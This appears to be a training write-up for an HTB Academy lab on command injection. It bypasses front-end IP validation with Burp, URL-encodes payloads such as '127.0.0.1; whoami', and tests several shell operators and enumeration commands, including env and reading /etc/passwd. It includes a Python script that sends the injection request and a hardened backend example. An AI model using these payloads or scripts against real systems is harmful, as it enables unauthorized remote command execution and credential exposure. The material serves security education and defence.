⚡ Practical Exploitation: Step-by-step command injection exploitation techniques and front-end bypass methods
After identifying a potentially vulnerable web application through detection methods, the next step is to craft and execute successful command injection payloads. This section demonstrates practical exploitation techniques, including bypassing common front-end validation mechanisms.
Focus: Transitioning from detection to successful command execution through systematic payload crafting and delivery.
Target: Host Checker web application
Vulnerable Parameter: IP address input field
Expected Backend Command: ping -c 1 OUR_INPUT
Payload Construction:
```text
# Base input
127.0.0.1
# Injection operator
;
# Injected command
whoami
# Final payload
127.0.0.1; whoami
```
Resulting Backend Command:
```sh
ping -c 1 127.0.0.1; whoami
```
Testing Payload Locally:
```sh
# Verify the command works before injection
21y4d@htb[/htb]$ ping -c 1 127.0.0.1; whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.03 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.034/1.034/1.034/0.000 ms
21y4d
```
Analysis: The command executes successfully locally: the ping output is followed by the username (21y4d), confirming that the semicolon terminates the ping command and the shell runs whoami as a second, independent command. Always test the exact string locally first; a typo in the operator is indistinguishable from a server-side filter once the payload is sent.
Payload Submission:
Input Field: 127.0.0.1; whoami
Action: Click "Check" button
Response:
Error: "Match the requested format"
Identifying Front-End Validation:
Step 1: Use Browser Developer Tools
Firefox: Ctrl + Shift + E (Network tab)
Chrome: F12 → Network tab
Step 2: Retry the Request
- Submit the malicious payload again
- Monitor the Network tab for HTTP requests
Observation:
Network Tab: No new requests displayed
Error Message: Still appears
Conclusion:
- No HTTP request was sent to the server
- Validation is happening client-side (front-end)
- Error message originates from JavaScript validation
Common Indicators:
- ✅ Instant error messages (no server delay)
- ✅ No network requests in developer tools
- ✅ Format-specific validation (IP address, email, etc.)
- ✅ JavaScript error handling visible in page source
Why This Happens:
- Different teams - Front-end and back-end developed separately
- Trust in client-side - Assuming front-end validation is sufficient
- Performance optimization - Reducing server load
- User experience - Immediate feedback without server round-trip
Step 1: Configure Web Proxy
Burp Suite Setup:
```sh
# Start Burp Suite
java -jar burpsuite.jar
# Configure Firefox proxy settings:
# Preferences → Network Settings → Manual proxy configuration
# HTTP Proxy: 127.0.0.1
# Port: 8080
# Use this proxy server for all protocols: ✓
```
ZAP Alternative:
```sh
# Start OWASP ZAP
./zap.sh
# Proxy configuration (ZAP also listens on 127.0.0.1:8080 by default):
# HTTP Proxy: 127.0.0.1
# Port: 8080
```
Step 2: Intercept Legitimate Request
Process:
- Enable proxy intercept in Burp Suite (Proxy → Intercept → Intercept is on)
- Submit a valid IP address (e.g., 127.0.0.1) in the web application, so the front-end validation passes and a request is actually sent
- Capture the legitimate HTTP request
- Send the request to Repeater (Ctrl + R)
Step 3: Captured Request Analysis
Sample HTTP Request:
```http
POST /index.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://target.com
Connection: close
Referer: http://target.com/
Upgrade-Insecure-Requests: 1

ip=127.0.0.1
```
Note that Content-Length must match the body exactly (ip=127.0.0.1 is 12 bytes); Burp Repeater updates it automatically when the body is edited, but a hand-built request must be corrected by hand.
Step 4: Craft Malicious Request
Original Parameter:
```text
ip=127.0.0.1
```
Modified Parameter:
```text
ip=127.0.0.1; whoami
```
Step 5: URL Encoding
Why URL Encoding is Needed:
- The body is application/x-www-form-urlencoded, so & separates parameters and + or %20 stands for a space; an unencoded & in the payload is parsed as the start of a new parameter and never reaches the ping command
- Some frameworks also treat ; as a parameter separator, so it must be encoded as well
- Encoding only protects the payload on the wire: the server decodes the body before handing the value to the shell, so the command arrives exactly as written
- It does not bypass server-side filtering, because any filter runs after decoding (double encoding is a separate technique covered under filter bypasses)
URL Encoding Process:
```text
# Raw payload
127.0.0.1; whoami
# URL encoded payload
127.0.0.1%3b%20whoami
# Burp Suite: select the payload in Repeater → Ctrl + U (URL-encode key characters)
```
URL Encoding Reference:
```text
;     → %3b
space → %20
&     → %26
|     → %7c
\n    → %0a
```
Hex digits are case-insensitive, so %3B and %3b decode identically.
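The following is an added example and not code from the original page: it builds the Host Checker POST body by hand, shows what a typical backend parser sees when the payload is sent raw versus encoded, and pulls the injected command's output back out of the response. The URL, header values and the sample response are constructed for illustration; urllib.parse.parse_qs is used as a stand-in for the server's form parser (older Python releases also split on ;, which is one reason the page encodes it).

```python
"""Added example, not from the original page: hand-built Host Checker
request plus response parsing. URL, headers and SAMPLE_RESPONSE are
constructed for illustration."""
import re
import urllib.parse
import urllib.request

# Operators from the page, plus space, encoded with safe="" so that every
# reserved character becomes a percent-escape (quote() emits upper-case hex;
# servers decode %3B and %3b identically).
OPERATORS = [";", " ", "&", "|", "\n", "&&", "||"]


def encode_operator_table() -> dict:
    """Return {operator: percent-encoding}, e.g. ';' -> '%3B'."""
    return {op: urllib.parse.quote(op, safe="") for op in OPERATORS}


def build_body(ip_value: str, encode: bool = True) -> str:
    """Form body for the 'ip' parameter. encode=False pastes the payload raw,
    which is what happens if the value is dropped into Repeater unencoded."""
    value = urllib.parse.quote(ip_value, safe="") if encode else ip_value
    return "ip=" + value


def server_side_view(body: str) -> dict:
    """Emulate a typical backend's parsing (PHP $_POST, Flask request.form):
    split on '&', then percent-decode each field; fields without '=' are dropped."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body).items()}


def build_request(url: str, ip_value: str) -> urllib.request.Request:
    """The POST that bypasses the browser's validation entirely: nothing in
    the request tells the server that no JavaScript ever ran."""
    body = build_body(ip_value).encode()
    return urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "Mozilla/5.0"},  # arbitrary value
    )


def send(req: urllib.request.Request, timeout: int = 10) -> str:
    """Deliver the request over the network (not exercised offline)."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Lines that belong to ping's own output; anything else in <pre> is ours.
PING_LINE = re.compile(
    r"^(PING |\d+ bytes from |--- .* ---$|\d+ packets transmitted|rtt min)")


def extract_injected_output(html: str) -> str:
    """Strip the ping chatter from the <pre> block and return what is left,
    i.e. the injected command's output."""
    m = re.search(r"<pre>(.*?)</pre>", html, re.S)
    if not m:
        return ""
    lines = [ln.strip() for ln in m.group(1).splitlines() if ln.strip()]
    return "\n".join(ln for ln in lines if not PING_LINE.match(ln))


# Constructed sample of the success response shown on the page.
SAMPLE_RESPONSE = """<html><body><pre>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.074/0.074/0.074/0.000 ms
www-data
</pre></body></html>"""

if __name__ == "__main__":
    for raw in ["127.0.0.1; whoami", "127.0.0.1 & whoami"]:
        print(repr(raw), "raw ->", server_side_view(build_body(raw, encode=False)))
        print(repr(raw), "enc ->", server_side_view(build_body(raw)))
    print(extract_injected_output(SAMPLE_RESPONSE))
```

Run it and compare the two views of 127.0.0.1 & whoami: sent raw, the server's ip parameter is truncated to "127.0.0.1 " and the command never reaches the shell; sent encoded, the full payload arrives and the & operator is live. The 24-byte encoded body is also the Content-Length the page's final request carries.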
Step 6: Send Modified Request
Final HTTP Request:
```http
POST /index.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://target.com
Connection: close
Referer: http://target.com/
Upgrade-Insecure-Requests: 1

ip=127.0.0.1%3b%20whoami
```
Successful Injection Response:
```http
HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 10:30:00 GMT
Server: Apache/2.4.41
Content-Type: text/html; charset=UTF-8
Content-Length: 1337

<!DOCTYPE html>
<html>
<head>
<title>Host Checker Results</title>
</head>
<body>
<div class="results">
<h2>Ping Results:</h2>
<pre>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.074/0.074/0.074/0.000 ms
www-data
</pre>
</div>
</body>
</html>
```
Key Indicators of Success:
- ✅ Ping output displayed - Original functionality preserved
- ✅ Injected command output - www-data appears after the ping results
- ✅ Both commands executed - Semicolon separator worked correctly
- ✅ Server-side execution - Command ran with the web server's privileges
Evidence of Successful Injection:
1. Command Output Structure:
```text
[Original ping command output]
[Injected command output: www-data]
```
2. Execution Context:
```text
# Injected command result
www-data
# Indicates:
# - Command executed on the server, not in the browser
# - Running as the www-data user (the web server account)
# - Linux/Unix environment
# - Remote code execution at the web server's privilege level (privilege escalation, if any, is a later step)
```
3. Response Timing:
```text
Normal ping response: ~0.1 seconds
Injection response: ~0.2 seconds (additional command execution time)
```
For a command as cheap as whoami the added time is small and noisy, so timing alone is not proof of execution; it becomes a reliable signal only when the injected command is deliberately slow (for example sleep 5), which is the basis of blind command injection testing.
Once basic injection is confirmed, test other operators:
```text
# 1. AND operator (&&)
ip=127.0.0.1%26%26%20whoami
# 2. OR operator (||): the first command must fail for the second to run
ip=invalid_ip%7c%7c%20whoami
# 3. Pipe operator (|)
ip=127.0.0.1%7c%20whoami
# 4. Background operator (&)
ip=127.0.0.1%26%20whoami
# 5. Newline operator (\n)
ip=127.0.0.1%0awhoami
```
Semicolon (;) - Command Chaining:
```sh
# Both commands execute sequentially, regardless of the first one's exit status
ping -c 1 127.0.0.1; whoami
# Output: [ping results] + [whoami results]
```
AND (&&) - Success-Dependent:
```sh
# Second command only if first succeeds (exit status 0)
ping -c 1 127.0.0.1 && whoami
# Output: [ping results] + [whoami results] (if ping succeeds)
```
OR (||) - Failure-Dependent:
```sh
# Second command only if first fails (an unresolvable host makes ping exit non-zero)
ping -c 1 invalid_ip || whoami
# Output: [ping error] + [whoami results]
```
Pipe (|) - Output Piping:
```sh
# First command's stdout becomes the second command's stdin; whoami ignores stdin, so only its output is visible
ping -c 1 127.0.0.1 | whoami
# Output: [whoami results only]
```
Basic Information Gathering:
```sh
# User context
whoami
id
# System information
hostname
uname -a
# Current directory
pwd
ls -la
# Environment
env
```
Example Payloads:
```text
# System identification
ip=127.0.0.1%3b%20uname%20-a
# User enumeration
ip=127.0.0.1%3b%20id
# Directory listing
ip=127.0.0.1%3b%20ls%20-la
# Environment variables
ip=127.0.0.1%3b%20env
```
Successful uname -a injection:
```text
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
Linux web-server 5.4.0-74-generic #83-Ubuntu SMP x86_64 GNU/Linux
```
Successful id injection:
```text
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Note that env output frequently contains credentials (database passwords, API keys) passed to the web process as environment variables; record that they are present for the report, but do not copy secret values into notes or screenshots beyond what the engagement requires.
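The following is an added example, not code from the original page: a stand-in for the Host Checker backend that shows how each operator listed above behaves once user input is concatenated into a shell command (the same model as the "Expected Backend Command" in the Payload Construction section), next to a hardened version that validates the value and never invokes a shell. echo replaces ping and echo INJECTED replaces whoami so the output is fixed and the code runs anywhere /bin/sh exists; a prefix of false emulates ping failing on an unresolvable host.

```python
"""Added example, not from the original page: vulnerable shell-concatenation
backend beside a hardened one. echo/false stand in for ping, and
'echo INJECTED' stands in for whoami."""
import ipaddress
import subprocess

INJECTED = "echo INJECTED"          # stand-in for the injected whoami
OPERATORS = [";", "&&", "||", "|", "&", "\n"]


def vulnerable_check(user_input: str, prefix: str = "echo checking ") -> str:
    """Mimics system("ping -c 1 " . $_POST['ip']): the value is concatenated
    into a string that /bin/sh parses, so shell metacharacters are live."""
    cmd = prefix + user_input
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def operator_survey(base: str = "127.0.0.1", prefix: str = "echo checking ") -> dict:
    """For each operator, report whether the injected command's output showed
    up. With the default prefix the first command always succeeds, so || never
    fires; with prefix="false " the first command fails, so || fires and &&
    does not (the reason the page pairs || with invalid_ip)."""
    return {op: "INJECTED" in vulnerable_check(f"{base} {op} {INJECTED}", prefix)
            for op in OPERATORS}


def is_valid_ip(value: str) -> bool:
    """Allow-list check with a real parser rather than a hand-rolled regex."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def hardened_check(user_input: str) -> str:
    """Validate first, then run the command as an argv list with shell=False,
    so no shell ever tokenises the user-controlled value. If a shell were
    unavoidable, shlex.quote() would be the fallback, but this is preferable."""
    if not is_valid_ip(user_input):
        raise ValueError("not an IP address: %r" % user_input)
    out = subprocess.run(["echo", "checking", user_input],   # echo stands in for ping
                         capture_output=True, text=True, check=True)
    return out.stdout


def hardened_rejects(user_input: str) -> bool:
    """True if the hardened path refuses the value before running anything."""
    try:
        hardened_check(user_input)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(vulnerable_check("127.0.0.1; echo INJECTED"), end="")
    print("first command succeeds:", operator_survey())
    print("first command fails:   ", operator_survey(prefix="false "))
    print("hardened rejects payload:", hardened_rejects("127.0.0.1; echo INJECTED"))
```

The survey dictionary is the "Document Working Payloads" table from the best-practice list below, produced mechanically; when a real target filters an operator, the corresponding entry flips to False. The hardened path rejects the payload before anything runs, whereas the vulnerable path returns the injected output on a second line.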
HTB Academy Lab Exercise:
Task: Review the HTML source code to find where front-end input validation is happening. On which line number is it?
Investigation Steps:
1. View Page Source:
```text
Right-click → View Page Source
OR
Ctrl + U (Firefox/Chrome)
```
2. Search for Validation Keywords:
```text
// Common validation patterns to search for:
- pattern= attribute on the input element ("match the requested format" is the browser's built-in constraint-validation message for an input whose value does not match its pattern attribute, so the validation may be declarative HTML rather than JavaScript)
- function validate
- input validation
- regex validation
- IP address validation
- onclick / onsubmit handlers
- form validation
```
3. JavaScript Analysis:
```javascript
// Illustrative front-end validation; "line 17" is an example placement, read the real line number from the target's own source
function validateIP(ip) {
  var pattern = /^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/;
  if (!pattern.test(ip)) {
    alert("Match the requested format");
    return false;
  }
  return true;
}
```
4. Form Handler Identification:
```html
<!-- Example form with validation -->
<form onsubmit="return validateIP(document.getElementById('ip').value)">
  <input type="text" id="ip" name="ip" placeholder="Enter an IP Address">
  <button type="submit">Check</button>
</form>
```
1. Start with Safe Commands:
```sh
# Non-destructive enumeration
whoami
hostname
pwd
```
2. Gradual Complexity:
```sh
# Progress from simple to complex
whoami              # Basic execution
id                  # User context
uname -a            # System information
ls -la /etc/passwd  # File enumeration
```
3. Document Working Payloads:
```text
# Keep track of successful operators
✓ ; (semicolon) - Works
✓ && (AND) - Works
✗ || (OR) - Filtered
? | (pipe) - Untested
```
Responsible Testing:
- Use non-destructive commands only
- Avoid creating files or modifying system state
- Document all activities for reporting
- Respect scope and authorization limits
Stealth Considerations:
- Watch response times and status codes: sudden delays, 403s or CAPTCHAs suggest a WAF or rate limiter has noticed the traffic
- Assume every injected command can be logged (web access logs, auditd, EDR process telemetry); if stealth is required, keep the number and noise of commands to a minimum
- Use common system utilities that blend in with normal server activity
- Consider rate limiting between requests
This systematic approach ensures reliable command injection exploitation while maintaining operational security and providing clear documentation for reporting purposes.
Key Takeaways:
- Front-end validation is insufficient - Can be easily bypassed with web proxies
- URL encoding is crucial - Ensures payload integrity during transmission
- Multiple operators should be tested - Different environments may filter specific characters
- Systematic enumeration - Build from basic commands to complex operations
- Documentation is essential - Track successful vectors for reporting and further exploitation
Next Steps: With basic exploitation confirmed, proceed to advanced techniques like blind command injection, filter bypass methods, and persistence mechanisms.